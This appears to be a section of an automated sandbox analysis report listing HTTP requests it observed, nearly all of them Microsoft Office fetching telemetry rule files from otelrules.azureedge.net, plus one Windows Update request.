Source: global traffic HTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=VRr5F+7gkvM5Kss&MD=Oh6bxDDd HTTP/1.1 host: slscr.update.microsoft.com accept: */* user-agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
Source: global traffic HTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
